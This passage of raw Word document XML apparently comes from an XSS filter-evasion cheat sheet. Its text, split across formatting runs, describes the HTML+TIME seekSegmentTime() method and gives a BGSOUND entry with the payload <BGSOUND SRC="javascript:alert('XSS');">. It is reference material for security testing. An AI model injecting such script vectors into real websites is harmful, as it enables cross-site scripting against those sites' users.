        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Interactive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Multimedia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Extensions)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>media</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>tag,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>processes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>embedded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ASF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>file)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2010"/>
          <w:tab w:val="left" w:pos="2011"/>
        </w:tabs>
        <w:spacing w:before="96" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="464" w:right="213" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16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3184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64770</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="949325" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="823" name="Group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9325" cy="116205"/>
                          <a:chOff x="1930" y="102"/>
                          <a:chExt cx="1495" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="824" name="Freeform 826"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="102"/>
                            <a:ext cx="1495" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3404 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1495"/>
                              <a:gd name="T2" fmla="+- 0 284 102"/>
                              <a:gd name="T3" fmla="*/ 284 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1495"/>
                              <a:gd name="T6" fmla="+- 0 284 102"/>
                              <a:gd name="T7" fmla="*/ 284 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1495"/>
                              <a:gd name="T10" fmla="+- 0 284 102"/>
                              <a:gd name="T11" fmla="*/ 284 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1495"/>
                              <a:gd name="T14" fmla="+- 0 263 102"/>
                              <a:gd name="T15" fmla="*/ 263 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1495"/>
                              <a:gd name="T18" fmla="+- 0 260 102"/>
                              <a:gd name="T19" fmla="*/ 260 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1495"/>
                              <a:gd name="T22" fmla="+- 0 123 102"/>
                              <a:gd name="T23" fmla="*/ 123 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1495"/>
                              <a:gd name="T26" fmla="+- 0 102 102"/>
                              <a:gd name="T27" fmla="*/ 102 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3404 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1495"/>
                              <a:gd name="T30" fmla="+- 0 102 102"/>
                              <a:gd name="T31" fmla="*/ 102 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3425 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1495"/>
                              <a:gd name="T34" fmla="+- 0 123 102"/>
                              <a:gd name="T35" fmla="*/ 123 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3425 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1495"/>
                              <a:gd name="T38" fmla="+- 0 263 102"/>
                              <a:gd name="T39" fmla="*/ 263 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3407 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1495"/>
                              <a:gd name="T42" fmla="+- 0 284 102"/>
                              <a:gd name="T43" fmla="*/ 284 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3404 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1495"/>
                              <a:gd name="T46" fmla="+- 0 284 102"/>
                              <a:gd name="T47" fmla="*/ 28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95" h="183">
                                <a:moveTo>
                                  <a:pt x="147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474" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1495" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1495" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1477" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="147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Text Box 82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02"/>
                            <a:ext cx="149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seekSegmentTime()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4" o:spid="_x0000_s1608" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:5.1pt;width:74.75pt;height:9.15pt;z-index:-17584640;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,102" coordsize="149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">
                <v:shape id="Freeform 826" o:spid="_x0000_s1609" style="position:absolute;left:1930;top:102;width:1495;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="149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I8z8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPwWrDMBBE74X8g9hALiWR67bBOFFCKZjmGrfQ62Kt&#10;LRNrZSzVdvr1USHQ4zAzb5j9cbadGGnwrWMFT5sEBHHldMuNgq/PYp2B8AFZY+eYFFzJw/GweNhj&#10;rt3EZxrL0IgIYZ+jAhNCn0vpK0MW/cb1xNGr3WAxRDk0Ug84RbjtZJokW2mx5bhgsKd3Q9Wl/LEK&#10;Hl9/n9N6LPrKILfJpPm7ST+UWi3ntx2IQHP4D9/bJ60gS1/g70w8AvJw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I8z8MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1474,182l21,182r-3,l,161r,-3l,21,21,,1474,r21,21l1495,161r-18,21l1474,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1474,284;21,284;18,284;0,263;0,260;0,123;21,102;1474,102;1495,123;1495,263;1477,284;1474,284" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 825" o:spid="_x0000_s1610" type="#_x0000_t202" style="position:absolute;left:1930;top:102;width:149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P4ucQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXkFb7qpoNjUVUQqCIIY48Hja/aZ&#10;LGbfptlV4793C4Ueh5n5hpkvO1uLO7XeOFbwPkpAEBdOGy4VnPLNcAbCB2SNtWNS8CQPy0W/N8dU&#10;uwdndD+GUkQI+xQVVCE0qZS+qMiiH7mGOHoX11oMUbal1C0+ItzWcpwkU2nRcFyosKF1RcX1eLMK&#10;VmfOvszP/vuQXTKT5x8J76ZXpQZv3eoTRKAu/If/2lutYDae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j+Ln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seekSegmentTime()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6"/>
        </w:rPr>
        <w:t>(this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>locates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>specified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>element's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>segment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>line</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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begins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>playing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>point.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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segment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>consists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>repetition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>line</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>including</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>play</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>AUTOREVERSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attribute.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>BGSOUND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10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8716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161290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2183765" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="820" name="Group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3765" cy="116205"/>
                          <a:chOff x="1614" y="254"/>
                          <a:chExt cx="3439" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="821" name="Freeform 823"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="253"/>
                            <a:ext cx="3439" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5032 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3439"/>
                              <a:gd name="T2" fmla="+- 0 436 254"/>
                              <a:gd name="T3" fmla="*/ 436 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3439"/>
                              <a:gd name="T6" fmla="+- 0 436 254"/>
                              <a:gd name="T7" fmla="*/ 436 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3439"/>
                              <a:gd name="T10" fmla="+- 0 435 254"/>
                              <a:gd name="T11" fmla="*/ 435 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3439"/>
                              <a:gd name="T14" fmla="+- 0 415 254"/>
                              <a:gd name="T15" fmla="*/ 415 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3439"/>
                              <a:gd name="T18" fmla="+- 0 412 254"/>
                              <a:gd name="T19" fmla="*/ 412 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3439"/>
                              <a:gd name="T22" fmla="+- 0 275 254"/>
                              <a:gd name="T23" fmla="*/ 275 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3439"/>
                              <a:gd name="T26" fmla="+- 0 254 254"/>
                              <a:gd name="T27" fmla="*/ 254 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5032 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3439"/>
                              <a:gd name="T30" fmla="+- 0 254 254"/>
                              <a:gd name="T31" fmla="*/ 254 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5053 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3439"/>
                              <a:gd name="T34" fmla="+- 0 275 254"/>
                              <a:gd name="T35" fmla="*/ 275 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5053 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3439"/>
                              <a:gd name="T38" fmla="+- 0 415 254"/>
                              <a:gd name="T39" fmla="*/ 415 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5035 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3439"/>
                              <a:gd name="T42" fmla="+- 0 435 254"/>
                              <a:gd name="T43" fmla="*/ 435 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5032 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3439"/>
                              <a:gd name="T46" fmla="+- 0 436 254"/>
                              <a:gd name="T47" fmla="*/ 4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439" h="183">
                                <a:moveTo>
                                  <a:pt x="341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418" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3439" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3439" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3421" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="341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Text Box 822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3"/>
                            <a:ext cx="343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&lt;BGSOUND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SRC="javascript:alert('XSS');"&gt;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1" o:spid="_x0000_s1611" style="position:absolute;margin-left:80.7pt;margin-top:12.7pt;width:171.95pt;height:9.15pt;z-index:-15629312;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,254" coordsize="343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">
                <v:shape id="Freeform 823" o:spid="_x0000_s1612" style="position:absolute;left:1614;top:253;width:3439;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="34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0hZMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2sCMRTE7wW/Q3iF3mrWP8iyNYqISunF1hW8vm6e&#10;2aWblyWJuv32Rij0OMzMb5j5sretuJIPjWMFo2EGgrhyumGj4FhuX3MQISJrbB2Tgl8KsFwMnuZY&#10;aHfjL7oeohEJwqFABXWMXSFlqGqyGIauI07e2XmLMUlvpPZ4S3DbynGWzaTFhtNCjR2ta6p+Dher&#10;YLY/lyv/Md2VJjvFCU4+8823UerluV+9gYjUx//wX/tdK8jHI3icS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SFkxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3418,182l21,182r-3,-1l,161r,-3l,21,21,,3418,r21,21l3439,161r-18,20l3418,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3418,436;21,436;18,435;0,415;0,412;0,275;21,254;3418,254;3439,275;3439,415;3421,435;3418,436" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 822" o:spid="_x0000_s1613" type="#_x0000_t202" style="position:absolute;left:1614;top:253;width:343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pgzcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3VjDmKjq4goFITSGA8en9ln&#10;sph9G7NbTf99VxB6HGbmG2ax6m0j7tR541jBZJyAIC6dNlwpOBa79xkIH5A1No5JwS95WC0HbwvM&#10;tHtwTvdDqESEsM9QQR1Cm0npy5os+rFriaN3cZ3FEGVXSd3hI8JtI9MkmUqLhuNCjS1taiqvhx+r&#10;YH3ifGtuX+fv/JKbovhIeD+9KjUa9us5iEB9+A+/2p9awSxN4Xk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KYM3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&lt;BGSOUND</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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SRC="javascript:alert('XSS');"&gt;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spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>includes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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8768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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1489075" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="817" name="Group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9075" cy="116205"/>
                          <a:chOff x="1614" y="242"/>
                          <a:chExt cx="2345" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="818" name="Freeform 820"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="2345" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3938 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2345"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2345"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
